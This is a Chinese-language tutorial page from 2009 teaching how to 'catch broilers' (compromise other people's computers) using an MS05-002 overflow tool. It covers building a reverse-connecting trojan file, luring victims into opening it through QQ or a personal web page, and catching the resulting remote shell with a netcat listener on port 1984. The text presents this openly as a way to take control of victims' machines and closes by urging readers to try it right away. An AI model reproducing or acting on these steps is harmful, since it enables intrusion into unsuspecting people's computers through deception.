当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客如何利用Ms05002溢出找“肉鸡”

安全基础
IE浏览器防黑十大秘籍,黑客也没招
网络工程师讲解系统安全漏洞的形成和防治
清除导致XP系统反复重启的新网银木马
识破QQ欺骗网络地址的几种方法汇总
安全基础知识 细说暴库的原理与方法
排除无线突然中断故障实例
强搜天线 搜出WiFi世界的安全漏洞
网管应用技巧 内网安全十大策略说明
如何修改局域网内部打印机的IP地址
如何找出IIS中隐藏的网站
EFS加密技术的概念分析及一次解密经过
提高Windows XP系统安全性要关闭的10种服务
PHPBB 2.0.22 MOD版最新注入漏洞
修复Windows系统忘记密码的9个高招
用SockOnline软件轻松突破端口限制
安全基础知识 最强0到33600端口详解
执行文件方式加密FLASH文件的解密方法
网吧被入侵后的应对解决方法
网页“黑手”如何攻击你的Windows系统
不要让别人读了你的信 谈私密数据保护

安全基础 中的 黑客如何利用Ms05002溢出找“肉鸡”


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 35 ::
收藏到网摘: n/a

 

  溢出攻击永远是安全界中,不可忽视的角色。而如今也正是肉鸡短缺的年代,能掌握一门最新的Ms05002溢出,必定会让你有“惊人”的收获。至于熟练的溢出如何炼成?具体方法请见下文所示!

  实施方法:通过Ms05002攻击工具,溢出反弹IP、反弹端口,会生成含有木马性质的文件。然后将这个产生的文件,以QQ传输的形式发给受害者观看,或者将其上传到自己的主页空间,引诱其他人访问。最后执行NC瑞士军刀,监听本机端口,收取已经运行产生文件的主机。

  步骤1.首先从网上下载Ms05002溢出工具,释放到比较理想的硬盘驱动器中,然后在CMD命令行下,输入软件名称启动该程序,会出现一些英文形式的帮助信息(如图1)。

  小提示:Ms05002溢出工具,是一款需要在命令行下支持运行的程序,它可以通过溢出反弹的IP地址,生成木马服务端。这点与其他溢出程序是完全不同,而且效率相比之下,也有明显的提高,真不愧是即所有溢出程序的升级版本。

  步骤2.继续在其下的命令行处,输入命令Ms05002 要生成的木马文件名 本地机器IP地址 溢出端口(如图2),然后敲击“回车键”执行。屏幕会不停的向上滚动,这时还会出现带有两句“OK”的字母提示,说明木马文件已经生成完毕了。



图 2

  步骤3.通常溢出过后,都需要监听工具来抓捕肉鸡。这里也不例外,跳转到事先准备的NC工具所在目录,然后在其命令行处输入NC –VV –L –P 1984的监听命令,并敲击“回车”键,开始监听本地1984端口的信息出入。

  小提示:NC监听软件-VV参数代表,得到更详细的输入监听内容。-L代表连接端口关闭后,仍然继续监听。-P进行监听本地端口,后跟数字就是所要监听的端口号。

  步骤4.将溢出生成的木马,以QQ形式发给网友运行,或者上传到自己的个人空间中,骗取受害者浏览运行。如果用户不幸查看所发去的木马,正在本机监听的NC等待状况,就会改为可操作命令行(如图3)。而此时的命令操作平台,也正是远方主机的SHELL平台(有关SHELL的解释,已经在前几篇文章中叙述过,这里就不做过多讲解了),现在你就可以在其主机上,为所欲为的以命令形式操控机器。



图 3

  结束语:最快捷和最灵验的“抓鸡”方法,已经摆在您面前了。还在犹豫什么?赶快前去一试此妙法吧!